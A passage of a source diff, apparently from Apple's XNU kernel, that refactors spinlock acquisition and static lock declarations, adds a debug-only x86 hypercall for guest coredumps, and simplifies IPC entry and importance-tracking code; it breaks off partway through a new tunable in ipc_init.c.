@@ spinlock_timeout_NMI(uintptr_t thread_addr) return spinlock_owner_cpu; } +__abortlike +static void +usimple_lock_acquire_timeout_panic(usimple_lock_t l) +{ + uintptr_t lowner = (uintptr_t)l->interlock.lock_data; + uint32_t lock_cpu; + + spinlock_timed_out = l; /* spinlock_timeout_NMI consumes this */ + lock_cpu = spinlock_timeout_NMI(lowner); + panic("Spinlock acquisition timed out: lock=%p, " + "lock owner thread=0x%lx, current_thread: %p, " + "lock owner active on CPU 0x%x, current owner: 0x%lx, time: %llu", + l, lowner, current_thread(), lock_cpu, + (uintptr_t)l->interlock.lock_data, mach_absolute_time()); +} + /* * Acquire a usimple_lock. * @@ -481,38 +553,57 @@ void usimple_lock_t l LCK_GRP_ARG(lck_grp_t *grp)) { -#ifndef MACHINE_SIMPLE_LOCK DECL_PC(pc); OBTAIN_PC(pc); USLDBG(usld_lock_pre(l, pc)); - if (__improbable(hw_lock_to(&l->interlock, LockTimeOutTSC, grp) == 0)) { - boolean_t uslock_acquired = FALSE; - while (machine_timeout_suspended()) { - enable_preemption(); - if ((uslock_acquired = hw_lock_to(&l->interlock, LockTimeOutTSC, grp))) { - break; - } + while (__improbable(hw_lock_to(&l->interlock, LockTimeOutTSC, grp) == 0)) { + if (!machine_timeout_suspended()) { + usimple_lock_acquire_timeout_panic(l); } + enable_preemption(); + } + +#if DEVELOPMENT || DEBUG + pltrace(FALSE); +#endif + + USLDBG(usld_lock_post(l, pc)); +#if CONFIG_DTRACE + LOCKSTAT_RECORD(LS_LCK_SPIN_LOCK_ACQUIRE, l, 0, (uintptr_t)LCK_GRP_PROBEARG(grp)); +#endif +} + +/* + * Acquire a usimple_lock_nopreempt + * + * Called and returns with preemption disabled. Note + * that the hw_lock routines are responsible for + * maintaining preemption state. + */ +static void +usimple_lock_nopreempt( + usimple_lock_t l, + lck_grp_t *grp) +{ + DECL_PC(pc); - if (uslock_acquired == FALSE) { - uint32_t lock_cpu; - uintptr_t lowner = (uintptr_t)l->interlock.lock_data; - spinlock_timed_out = l; - lock_cpu = spinlock_timeout_NMI(lowner); - panic("Spinlock acquisition timed out: lock=%p, lock owner thread=0x%lx, current_thread: %p, lock owner active on CPU 0x%x, current owner: 0x%lx, time: %llu", - l, lowner, current_thread(), lock_cpu, (uintptr_t)l->interlock.lock_data, mach_absolute_time()); + OBTAIN_PC(pc); + USLDBG(usld_lock_pre(l, pc)); + + while (__improbable(hw_lock_to_nopreempt(&l->interlock, LockTimeOutTSC, grp) == 0)) { + if (!machine_timeout_suspended()) { + usimple_lock_acquire_timeout_panic(l); } + enable_preemption(); } + #if DEVELOPMENT || DEBUG pltrace(FALSE); #endif USLDBG(usld_lock_post(l, pc)); -#else - simple_lock((simple_lock_t)l, grp); -#endif #if CONFIG_DTRACE LOCKSTAT_RECORD(LS_LCK_SPIN_LOCK_ACQUIRE, l, 0, (uintptr_t)LCK_GRP_PROBEARG(grp)); #endif @@ -530,7 +621,6 @@ void usimple_unlock( usimple_lock_t l) { -#ifndef MACHINE_SIMPLE_LOCK DECL_PC(pc); OBTAIN_PC(pc); @@ -539,11 +629,28 @@ usimple_unlock( pltrace(TRUE); #endif hw_lock_unlock(&l->interlock); -#else - simple_unlock_rwmb((simple_lock_t)l); -#endif } +/* + * Release a usimple_unlock_nopreempt. + * + * Called and returns with preemption enabled. Note + * that the hw_lock routines are responsible for + * maintaining preemption state. + */ +void +usimple_unlock_nopreempt( + usimple_lock_t l) +{ + DECL_PC(pc); + + OBTAIN_PC(pc); + USLDBG(usld_unlock(l, pc)); +#if DEVELOPMENT || DEBUG + pltrace(TRUE); +#endif + hw_lock_unlock_nopreempt(&l->interlock); +} /* * Conditionally acquire a usimple_lock. @@ -562,7 +669,6 @@ usimple_lock_try( usimple_lock_t l, lck_grp_t *grp) { -#ifndef MACHINE_SIMPLE_LOCK unsigned int success; DECL_PC(pc); @@ -575,9 +681,36 @@ usimple_lock_try( USLDBG(usld_lock_try_post(l, pc)); } return success; -#else - return simple_lock_try((simple_lock_t)l, grp); +} + +/* + * Conditionally acquire a usimple_lock. + * + * Called and returns with preemption disabled. Note + * that the hw_lock routines are responsible for + * maintaining preemption state. + * + * XXX No stats are gathered on a miss; I preserved this + * behavior from the original assembly-language code, but + * doesn't it make sense to log misses? XXX + */ +static unsigned int +usimple_lock_try_nopreempt( + usimple_lock_t l, + lck_grp_t *grp) +{ + unsigned int success; + DECL_PC(pc); + + OBTAIN_PC(pc); + USLDBG(usld_lock_try_pre(l, pc)); + if ((success = hw_lock_try_nopreempt(&l->interlock, grp))) { +#if DEVELOPMENT || DEBUG + pltrace(FALSE); #endif + USLDBG(usld_lock_try_post(l, pc)); + } + return success; } /* diff --git a/osfmk/i386/machine_routines.c b/osfmk/i386/machine_routines.c index 6ebfd9a7e..7d0e21dac 100644 --- a/osfmk/i386/machine_routines.c +++ b/osfmk/i386/machine_routines.c @@ -1237,11 +1237,6 @@ ml_cpu_can_exit(__unused int cpu_id) return true; } -void -ml_cpu_init_state(void) -{ -} - void ml_cpu_begin_state_transition(__unused int cpu_id) { diff --git a/osfmk/i386/pcb.c b/osfmk/i386/pcb.c index 603fb0008..29bff1a8f 100644 --- a/osfmk/i386/pcb.c +++ b/osfmk/i386/pcb.c @@ -63,7 +63,6 @@ #include #include -#include #include #include #include diff --git a/osfmk/i386/pcb_native.c b/osfmk/i386/pcb_native.c index 6960a022e..207db2d63 100644 --- a/osfmk/i386/pcb_native.c +++ b/osfmk/i386/pcb_native.c @@ -63,7 +63,6 @@ #include #include -#include #include #include #include diff --git a/osfmk/i386/phys.c b/osfmk/i386/phys.c index 130c8aec3..642f9f216 100644 --- a/osfmk/i386/phys.c +++ b/osfmk/i386/phys.c @@ -63,7 +63,6 @@ #include #include -#include #include #include #include diff --git a/osfmk/i386/pmap.h b/osfmk/i386/pmap.h index 34a434d7d..eb470b06e 100644 --- a/osfmk/i386/pmap.h +++ b/osfmk/i386/pmap.h @@ -842,6 +842,10 @@ extern boolean_t pmap_is_empty(pmap_t pmap, kern_return_t pmap_permissions_verify(pmap_t, vm_map_t, vm_offset_t, vm_offset_t); +#if DEVELOPMENT || DEBUG +extern kern_return_t pmap_test_text_corruption(pmap_paddr_t); +#endif /* DEVELOPMENT || DEBUG */ + #if MACH_ASSERT extern int pmap_stats_assert; #define PMAP_STATS_ASSERTF(args) \ diff --git a/osfmk/i386/ucode.c b/osfmk/i386/ucode.c index 4c5d43d09..12d593dc3 100644 --- a/osfmk/i386/ucode.c +++ b/osfmk/i386/ucode.c @@ -60,60 +60,8 @@ update_microcode(void) } /* locks */ -static lck_grp_attr_t *ucode_slock_grp_attr = NULL; -static lck_grp_t *ucode_slock_grp = NULL; -static lck_attr_t *ucode_slock_attr = NULL; -static lck_spin_t *ucode_slock = NULL; - -static kern_return_t -register_locks(void) -{ - /* already allocated? */ - if (ucode_slock_grp_attr && ucode_slock_grp && ucode_slock_attr && ucode_slock) { - return KERN_SUCCESS; - } - - /* allocate lock group attribute and group */ - if (!(ucode_slock_grp_attr = lck_grp_attr_alloc_init())) { - goto nomem_out; - } - - if (!(ucode_slock_grp = lck_grp_alloc_init("uccode_lock", ucode_slock_grp_attr))) { - goto nomem_out; - } - - /* Allocate lock attribute */ - if (!(ucode_slock_attr = lck_attr_alloc_init())) { - goto nomem_out; - } - - /* Allocate the spin lock */ - /* We keep one global spin-lock. We could have one per update - * request... but srsly, why would you update microcode like that? - */ - if (!(ucode_slock = lck_spin_alloc_init(ucode_slock_grp, ucode_slock_attr))) { - goto nomem_out; - } - - return KERN_SUCCESS; - -nomem_out: - /* clean up */ - if (ucode_slock) { - lck_spin_free(ucode_slock, ucode_slock_grp); - } - if (ucode_slock_attr) { - lck_attr_free(ucode_slock_attr); - } - if (ucode_slock_grp) { - lck_grp_free(ucode_slock_grp); - } - if (ucode_slock_grp_attr) { - lck_grp_attr_free(ucode_slock_grp_attr); - } - - return KERN_NO_SPACE; -} +static LCK_GRP_DECLARE(ucode_slock_grp, "uccode_lock"); +static LCK_SPIN_DECLARE(ucode_slock, &ucode_slock_grp); /* Copy in an update */ static int @@ -168,13 +116,13 @@ static void cpu_apply_microcode(void) { /* grab the lock */ - lck_spin_lock(ucode_slock); + lck_spin_lock(&ucode_slock); /* execute the update */ update_microcode(); /* release the lock */ - lck_spin_unlock(ucode_slock); + lck_spin_unlock(&ucode_slock); } static void @@ -245,10 +193,6 @@ xcpu_update(void) { cpumask_t dest_cpumask; - if (register_locks() != KERN_SUCCESS) { - return; - } - mp_disable_preemption(); dest_cpumask = CPUMASK_OTHERS; cpu_apply_microcode(); diff --git a/osfmk/i386/vmx/vmx_cpu.c b/osfmk/i386/vmx/vmx_cpu.c index efd2ff662..f9cf56840 100644 --- a/osfmk/i386/vmx/vmx_cpu.c +++ b/osfmk/i386/vmx/vmx_cpu.c @@ -42,8 +42,8 @@ int vmx_use_count = 0; boolean_t vmx_exclusive = FALSE; -lck_grp_t *vmx_lck_grp = NULL; -lck_mtx_t *vmx_lck_mtx = NULL; +static LCK_GRP_DECLARE(vmx_lck_grp, "vmx"); +static LCK_MTX_DECLARE(vmx_lck_mtx, &vmx_lck_grp); /* ----------------------------------------------------------------------------- * vmx_is_available() @@ -115,16 +115,6 @@ vmx_enable(void) set_cr4(get_cr4() | CR4_VMXE); } -void -vmx_init() -{ - vmx_lck_grp = lck_grp_alloc_init("vmx", LCK_GRP_ATTR_NULL); - assert(vmx_lck_grp); - - vmx_lck_mtx = lck_mtx_alloc_init(vmx_lck_grp, LCK_ATTR_NULL); - assert(vmx_lck_mtx); -} - /* ----------------------------------------------------------------------------- * vmx_get_specs() * Obtain VMX facility specifications for this CPU and @@ -313,7 +303,7 @@ host_vmxon(boolean_t exclusive) return VMX_UNSUPPORTED; } - lck_mtx_lock(vmx_lck_mtx); + lck_mtx_lock(&vmx_lck_mtx); if (vmx_exclusive || (exclusive && vmx_use_count)) { error = VMX_INUSE; @@ -331,7 +321,7 @@ host_vmxon(boolean_t exclusive) error = VMX_OK; } - lck_mtx_unlock(vmx_lck_mtx); + lck_mtx_unlock(&vmx_lck_mtx); return error; } @@ -345,7 +335,7 @@ host_vmxoff() { assert(0 == get_preemption_level()); - lck_mtx_lock(vmx_lck_mtx); + lck_mtx_lock(&vmx_lck_mtx); if (1 == vmx_use_count) { vmx_exclusive = FALSE; @@ -356,7 +346,7 @@ host_vmxoff() vmx_use_count--; } - lck_mtx_unlock(vmx_lck_mtx); + lck_mtx_unlock(&vmx_lck_mtx); VMX_KPRINTF("VMX use count: %d\n", vmx_use_count); } diff --git a/osfmk/i386/vmx/vmx_cpu.h b/osfmk/i386/vmx/vmx_cpu.h index eb9390861..7edea3f5b 100644 --- a/osfmk/i386/vmx/vmx_cpu.h +++ b/osfmk/i386/vmx/vmx_cpu.h @@ -60,7 +60,6 @@ typedef struct vmx_cpu { void *vmxon_region; /* the logical address of the VMXON region page */ } vmx_cpu_t; -void vmx_init(void); void vmx_cpu_init(void); void vmx_resume(boolean_t is_wake_from_hibernate); void vmx_suspend(void); diff --git a/osfmk/i386/x86_hypercall.c b/osfmk/i386/x86_hypercall.c new file mode 100644 index 000000000..e76e38d65 --- /dev/null +++ b/osfmk/i386/x86_hypercall.c @@ -0,0 +1,96 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#include +#include +#include +#include + + +static bool +hvg_live_coredump_enabled(void) +{ + return cpuid_vmm_present() && (cpuid_vmm_get_applepv_features() & CPUID_LEAF_FEATURE_COREDUMP) != 0; +} + +/* + * This routine issues an Apple hypercall that notifies the hypervisor to + * take a guest kernel coredump. If the vmcore argument is not NULL, the + * name tag of the vmcore file is copied into the caller's vmcore tag array. + * Otherwise the name tag is ignored. + */ + +hvg_hcall_return_t +hvg_hcall_trigger_dump(hvg_hcall_vmcore_file_t *vmcore, + const hvg_hcall_dump_option_t dump_option) +{ + hvg_hcall_return_t ret; + hvg_hcall_output_regs_t output; + const size_t reg_size = sizeof(output.rax); + + /* Does the hypervisor support feature: live kernel core dump? */ + if (!hvg_live_coredump_enabled()) { + return HVG_HCALL_FEAT_DISABLED; + } + + /* Make sure that we don't overflow vmcore tag array with hypercall output */ + if (vmcore && (reg_size != sizeof(uint64_t))) { + os_log_error(OS_LOG_DEFAULT, "%s: invalid hcall register size, %zu bytes (expect %zu bytes)\n", + __func__, reg_size, sizeof(uint64_t)); + return HVG_HCALL_INVALID_PARAMETER; + } + + switch (dump_option) { + case HVG_HCALL_DUMP_OPTION_REGULAR: + /* Only regular dump-guest-memory is supported for now */ + break; + default: + return HVG_HCALL_INVALID_PARAMETER; + } + + /* Everything checks out, issue hypercall */ + memset(&output, 0, sizeof(hvg_hcall_output_regs_t)); + ret = hvg_hypercall1(HVG_HCALL_TRIGGER_DUMP, + dump_option, + &output); + + if (ret == HVG_HCALL_SUCCESS) { + if (vmcore) { + /* Caller requested vmcore tag to be returned */ + memcpy(&vmcore->tag[0], &output.rax, reg_size); + memcpy(&vmcore->tag[reg_size], &output.rdi, reg_size); + memcpy(&vmcore->tag[reg_size * 2], &output.rsi, reg_size); + memcpy(&vmcore->tag[reg_size * 3], &output.rdx, reg_size); + memcpy(&vmcore->tag[reg_size * 4], &output.rcx, reg_size); + memcpy(&vmcore->tag[reg_size * 5], &output.r8, reg_size); + memcpy(&vmcore->tag[reg_size * 6], &output.r9, reg_size); + vmcore->tag[reg_size * 7] = '\0'; + } + } + return ret; +} diff --git a/osfmk/i386/x86_hypercall.h b/osfmk/i386/x86_hypercall.h new file mode 100644 index 000000000..7dedfcc08 --- /dev/null +++ b/osfmk/i386/x86_hypercall.h @@ -0,0 +1,182 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#ifndef _I386_X86_HYPERCALL_H_ +#define _I386_X86_HYPERCALL_H_ + +#if DEBUG || DEVELOPMENT + + +/* + * Apple Hypercall Calling Convention (x64) + * + * Registers | Usage | + * -------------------------------------------------------- + * %rax | In: hypercall code | + * | Out: if RFLAGS.CF = 0 (success) | + * | hypercall output[0] | + * | if RFLAGS.CF = 1 (error) | + * | hypercall error value | + * %rdi | In: 1st argument | + * | Out: hypercall output[1] | + * %rsi | In: 2nd argument | + * | Out: hypercall output[2] | + * %rdx | In: 3rd argument | + * | Out: hypercall output[3] | + * %rcx | In: 4th argument | + * | Out: hypercall output[4] | + * %r8 | In: 5th argument | + * | Out: hypercall output[5] | + * %r9 | In: 6th argument | + * | Out: hypercall output[6] | + * + * %rax is used by the caller to specify hypercall code. When a hypercall fails, + * the hypervisor stores errno in %rax. A successful hypercall returns the + * output of the call in %rax, %rdi, %rsi, %rdx, %rcx, %r8, and %r9. + */ + +typedef struct hvg_hcall_output_regs { + uint64_t rax; + uint64_t rdi; + uint64_t rsi; + uint64_t rdx; + uint64_t rcx; + uint64_t r8; + uint64_t r9; +} hvg_hcall_output_regs_t; + +/* + * To avoid collision with other hypercall interfaces (e.g., KVM) in the vmcall + * namespace, Apple hypercalls put "A" (0x41) in the top byte of %eax so that + * hypervisors can support multiple hypercall interfaces simultaneously and + * handle Apple hypercalls correctly for compatiblity. + * + * For example, KVM uses the same vmcall instruction and has call code 1 for + * KVM_HC_VAPIC_POLL_IRQ. When invoking an Apple hypercall with code 1, a + * hypervisor will not accidentially treat the Apple hypercall as a KVM call. + */ + +#define HVG_HCALL_CODE(code) ('A' << 24 | (code & 0xFFFFFF)) + + +/* + * Caller is responsible for checking the existence of Apple Hypercall + * before invoking Apple hypercalls. + */ + +#define HVG_HCALL_RETURN(rax) {\ + __asm__ __volatile__ goto (\ + "jnc 2f \n\t" \ + "jmp %l0 \n\t" \ + "2: \n\t" \ + : /* no output */ \ + : /* no input */ \ + : /* no clobber */ \ + : error);\ + return HVG_HCALL_SUCCESS;\ +error:\ + return (hvg_hcall_return_t)rax;\ +} + +static inline hvg_hcall_return_t +hvg_hypercall6(uint64_t code, uint64_t rdi, uint64_t rsi, uint64_t rdx, uint64_t rcx, uint64_t r8, uint64_t r9, + hvg_hcall_output_regs_t *output) +{ + __asm__ __volatile__ ("movq %12, %%r8 \n\t" + "movq %13, %%r9 \n\t" + "vmcall \n\t" + "movq %%r8, %5 \n\t" + "movq %%r9, %6 \n\t" + : "=a" (output->rax), /* %0: output[0] */ + "=D" (output->rdi), /* %1: output[1] */ + "=S" (output->rsi), /* %2: output[2] */ + "=d" (output->rdx), /* %3: output[3] */ + "=c" (output->rcx), /* %4: output[4] */ + "=r" (output->r8), /* %5: output[5] */ + "=r" (output->r9) /* %6: output[6] */ + : "a" (HVG_HCALL_CODE(code)),/* %7: call code */ + "D" (rdi), /* %8: arg[0] */ + "S" (rsi), /* %9: arg[1] */ + "d" (rdx), /* %10: arg[2] */ + "c" (rcx), /* %11: arg[3] */ + "r" (r8), /* %12: arg[4] */ + "r" (r9) /* %13: arg[5] */ + : "memory", "r8", "r9"); + HVG_HCALL_RETURN(output->rax); +} + +static inline hvg_hcall_return_t +hvg_hypercall0(const uint64_t code, + hvg_hcall_output_regs_t *output) +{ + return hvg_hypercall6(code, 0, 0, 0, 0, 0, 0, output); +} + +static inline hvg_hcall_return_t +hvg_hypercall1(const uint64_t code, + const uint64_t rdi, + hvg_hcall_output_regs_t *output) +{ + return hvg_hypercall6(code, rdi, 0, 0, 0, 0, 0, output); +} + +static inline hvg_hcall_return_t +hvg_hypercall2(const uint64_t code, + const uint64_t rdi, const uint64_t rsi, + hvg_hcall_output_regs_t *output) +{ + return hvg_hypercall6(code, rdi, rsi, 0, 0, 0, 0, output); +} + +static inline hvg_hcall_return_t +hvg_hypercall3(const uint64_t code, + const uint64_t rdi, const uint64_t rsi, const uint64_t rdx, + hvg_hcall_output_regs_t *output) +{ + return hvg_hypercall6(code, rdi, rsi, rdx, 0, 0, 0, output); +} + +static inline hvg_hcall_return_t +hvg_hypercall4(const uint64_t code, + const uint64_t rdi, const uint64_t rsi, const uint64_t rdx, const uint64_t rcx, + hvg_hcall_output_regs_t *output) +{ + return hvg_hypercall6(code, rdi, rsi, rdx, rcx, 0, 0, output); +} + +static inline hvg_hcall_return_t +hvg_hypercall5(const uint64_t code, + const uint64_t rdi, const uint64_t rsi, const uint64_t rdx, const uint64_t rcx, const uint64_t r8, + hvg_hcall_output_regs_t *output) +{ + return hvg_hypercall6(code, rdi, rsi, rdx, rcx, r8, 0, output); +} + +#endif /* DEBUG || DEVELOPMENT */ + +#endif /* _I386_X86_HYPERCALL_H_ */ diff --git a/osfmk/ipc/ipc_entry.c b/osfmk/ipc/ipc_entry.c index e05803973..4195a3aca 100644 --- a/osfmk/ipc/ipc_entry.c +++ b/osfmk/ipc/ipc_entry.c @@ -223,34 +223,6 @@ ipc_entry_claim( return KERN_SUCCESS; } -/* - * Routine: ipc_entry_get - * Purpose: - * Tries to allocate an entry out of the space. - * Conditions: - * The space is write-locked and active throughout. - * An object may be locked. Will not allocate memory. - * Returns: - * KERN_SUCCESS A free entry was found. - * KERN_NO_SPACE No entry allocated. - */ - -kern_return_t -ipc_entry_get( - ipc_space_t space, - mach_port_name_t *namep, - ipc_entry_t *entryp) -{ - kern_return_t kr; - - kr = ipc_entries_hold(space, 1); - if (KERN_SUCCESS != kr) { - return kr; - } - - return ipc_entry_claim(space, namep, entryp); -} - /* * Routine: ipc_entry_alloc * Purpose: @@ -281,9 +253,9 @@ ipc_entry_alloc( return KERN_INVALID_TASK; } - kr = ipc_entry_get(space, namep, entryp); + kr = ipc_entries_hold(space, 1); if (kr == KERN_SUCCESS) { - return kr; + return ipc_entry_claim(space, namep, entryp); } kr = ipc_entry_grow_table(space, ITS_SIZE_NONE); @@ -409,7 +381,6 @@ ipc_entry_alloc_name( */ kern_return_t kr; kr = ipc_entry_grow_table(space, index + 1); - assert(kr != KERN_NO_SPACE); if (kr != KERN_SUCCESS) { /* space is unlocked */ return kr; diff --git a/osfmk/ipc/ipc_entry.h b/osfmk/ipc/ipc_entry.h index 5601b84c8..781cc5c1c 100644 --- a/osfmk/ipc/ipc_entry.h +++ b/osfmk/ipc/ipc_entry.h @@ -235,12 +235,6 @@ extern kern_return_t ipc_entry_claim( mach_port_name_t *namep, ipc_entry_t *entryp); -/* Allocate an entry in a space */ -extern kern_return_t ipc_entry_get( - ipc_space_t space, - mach_port_name_t *namep, - ipc_entry_t *entryp); - /* Allocate an entry in a space, growing the space if necessary */ extern kern_return_t ipc_entry_alloc( ipc_space_t space, diff --git a/osfmk/ipc/ipc_eventlink.c b/osfmk/ipc/ipc_eventlink.c index 87a31f784..7e461457f 100644 --- a/osfmk/ipc/ipc_eventlink.c +++ b/osfmk/ipc/ipc_eventlink.c @@ -1009,7 +1009,7 @@ convert_port_to_eventlink_locked( if (ip_active(port) && ip_kotype(port) == IKOT_EVENTLINK) { - ipc_eventlink = (struct ipc_eventlink *)port->ip_kobject; + ipc_eventlink = (struct ipc_eventlink *)ipc_kobject_get(port); if (ipc_eventlink) { ipc_eventlink_reference(ipc_eventlink); diff --git a/osfmk/ipc/ipc_importance.c b/osfmk/ipc/ipc_importance.c index bc3980f2d..2c76a7281 100644 --- a/osfmk/ipc/ipc_importance.c +++ b/osfmk/ipc/ipc_importance.c @@ -1997,6 +1997,16 @@ task_importance_update_owner_info(task_t task) } #endif +static int +task_importance_task_get_pid(ipc_importance_task_t iit) +{ +#if DEVELOPMENT || DEBUG + return (int)iit->iit_bsd_pid; +#else + return task_pid(iit->iit_task); +#endif +} + /* * Routine: ipc_importance_reset_locked * Purpose: @@ -2034,13 +2044,6 @@ ipc_importance_reset_locked(ipc_importance_task_t task_imp, boolean_t donor) task_imp->iit_legacy_externdrop = 0; after_donor = ipc_importance_task_is_donor(task_imp); -#if DEVELOPMENT || DEBUG - if (task_imp->iit_assertcnt > 0 && task_imp->iit_live_donor) { - printf("Live donor task %s[%d] still has %d importance assertions after reset\n", - task_imp->iit_procname, task_imp->iit_bsd_pid, task_imp->iit_assertcnt); - } -#endif - /* propagate a downstream drop if there was a change in donor status */ if (after_donor != before_donor) { ipc_importance_task_propagate_assertion_locked(task_imp, IIT_UPDATE_DROP, FALSE); @@ -3260,7 +3263,8 @@ ipc_importance_receive( * will trigger the probe in ipc_importance_task_externalize_assertion() * above and have impresult==1 here. */ - DTRACE_BOOST5(receive_boost, task_t, task_self, int, task_pid(task_self), int, sender_pid, int, 1, int, task_self->task_imp_base->iit_assertcnt); + DTRACE_BOOST5(receive_boost, task_t, task_self, int, task_pid(task_self), + int, sender_pid, int, 1, int, task_self->task_imp_base->iit_assertcnt); } #endif /* IMPORTANCE_TRACE */ } @@ -3587,59 +3591,61 @@ ipc_importance_extract_content( mach_voucher_attr_content_t out_content, mach_voucher_attr_content_size_t *in_out_content_size) { - mach_voucher_attr_content_size_t size = 0; ipc_importance_elem_t elem; unsigned int i; + char *buf = (char *)out_content; + mach_voucher_attr_content_size_t size = *in_out_content_size; + mach_voucher_attr_content_size_t pos = 0; + __unused int pid; + IMPORTANCE_ASSERT_MANAGER(manager); IMPORTANCE_ASSERT_KEY(key); /* the first non-default value provides the data */ - for (i = 0; i < value_count && *in_out_content_size > 0; i++) { + for (i = 0; i < value_count; i++) { elem = (ipc_importance_elem_t)values[i]; if (IIE_NULL == elem) { continue; } - snprintf((char *)out_content, *in_out_content_size, "Importance for pid "); - size = (mach_voucher_attr_content_size_t)strlen((char *)out_content); + pos += scnprintf(buf + pos, size - pos, "Importance for "); for (;;) { ipc_importance_inherit_t inherit = III_NULL; ipc_importance_task_t task_imp; - task_t task; - int t_pid; if (IIE_TYPE_TASK == IIE_TYPE(elem)) { task_imp = (ipc_importance_task_t)elem; - task = task_imp->iit_task; - t_pid = (TASK_NULL != task) ? - task_pid(task) : -1; - snprintf((char *)out_content + size, *in_out_content_size - size, "%d", t_pid); } else { inherit = (ipc_importance_inherit_t)elem; task_imp = inherit->iii_to_task; - task = task_imp->iit_task; - t_pid = (TASK_NULL != task) ? - task_pid(task) : -1; - snprintf((char *)out_content + size, *in_out_content_size - size, - "%d (%d of %d boosts) %s from pid ", t_pid, - III_EXTERN(inherit), inherit->iii_externcnt, - (inherit->iii_donating) ? "donated" : "linked"); } - - size = (mach_voucher_attr_content_size_t)strlen((char *)out_content); +#if DEVELOPMENT || DEBUG + pos += scnprintf(buf + pos, size - pos, "%s[%d]", + task_imp->iit_procname, task_imp->iit_bsd_pid); +#else + ipc_importance_lock(); + pid = task_importance_task_get_pid(task_imp); + ipc_importance_unlock(); + pos += scnprintf(buf + pos, size - pos, "pid %d", pid); +#endif /* DEVELOPMENT || DEBUG */ if (III_NULL == inherit) { break; } - + pos += scnprintf(buf + pos, size - pos, + " (%d of %d boosts) %s from ", + III_EXTERN(inherit), inherit->iii_externcnt, + (inherit->iii_donating) ? "donated" : "linked"); elem = inherit->iii_from_elem; } - size++; /* account for NULL */ + + pos++; /* account for terminating \0 */ + break; } *out_command = MACH_VOUCHER_ATTR_NOOP; /* cannot be used to regenerate value */ - *in_out_content_size = size; + *in_out_content_size = pos; return KERN_SUCCESS; } @@ -3863,14 +3869,7 @@ task_importance_list_pids(task_t task, int flags, char *pid_list, unsigned int m target_pid = -1; if (temp_inherit->iii_donating) { -#if DEVELOPMENT || DEBUG - target_pid = temp_inherit->iii_to_task->iit_bsd_pid; -#else - temp_task = temp_inherit->iii_to_task->iit_task; - if (temp_task != TASK_NULL) { - target_pid = task_pid(temp_task); - } -#endif + target_pid = task_importance_task_get_pid(temp_inherit->iii_to_task); } if (target_pid != -1 && previous_pid != target_pid) { @@ -3898,19 +3897,12 @@ task_importance_list_pids(task_t task, int flags, char *pid_list, unsigned int m continue; } - if (IIE_TYPE_TASK == IIE_TYPE(elem) && - (((ipc_importance_task_t)elem)->iit_task != TASK_NULL)) { - target_pid = task_pid(((ipc_importance_task_t)elem)->iit_task); + if (IIE_TYPE_TASK == IIE_TYPE(elem)) { + ipc_importance_task_t temp_iit = (ipc_importance_task_t)elem; + target_pid = task_importance_task_get_pid(temp_iit); } else { temp_inherit = (ipc_importance_inherit_t)elem; -#if DEVELOPMENT || DEBUG - target_pid = temp_inherit->iii_to_task->iit_bsd_pid; -#else - temp_task = temp_inherit->iii_to_task->iit_task; - if (temp_task != TASK_NULL) { - target_pid = task_pid(temp_task); - } -#endif + target_pid = task_importance_task_get_pid(temp_inherit->iii_to_task); } if (target_pid != -1 && previous_pid != target_pid) { diff --git a/osfmk/ipc/ipc_init.c b/osfmk/ipc/ipc_init.c index b6ff1fc9e..b2a97a89c 100644 --- a/osfmk/ipc/ipc_init.c +++ b/osfmk/ipc/ipc_init.c @@ -110,7 +110,7 @@ #include /* NDR_record */ -#define IPC_KERNEL_MAP_SIZE (1024 * 1024) +#define IPC_KERNEL_MAP_SIZE (CONFIG_IPC_KERNEL_MAP_SIZE * 1024 * 1024) SECURITY_READ_ONLY_LATE(vm_map_t) ipc_kernel_map; /* values to limit physical copy out-of-line memory descriptors */ @@ -125,6 +125,19 @@ const vm_size_t ipc_kmsg_max_vm_space = ((IPC_KERNEL_COPY_MAP_SIZE * 7) / 8); #define IPC_KMSG_MAX_SPACE (64 * 1024 * 1024) /* keep in sync with COPYSIZELIMIT_PANIC */ const vm_size_t ipc_kmsg_max_body_space = ((IPC_KMSG_MAX_SPACE * 3) / 4 - MAX_TRAILER_SIZE); +#if XNU_TARGET_OS_OSX +#define IPC_CONTROL_PORT_OPTIONS_DEFAULT IPC_CONTROL_PORT_OPTIONS_NONE +#else +#define IPC_CONTROL_PORT_OPTIONS_DEFAULT (IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_HARD | IPC_CONTROL_PORT_OPTIONS_PINNED_SOFT) +#endif + +TUNABLE(ipc_control_port_options_t, 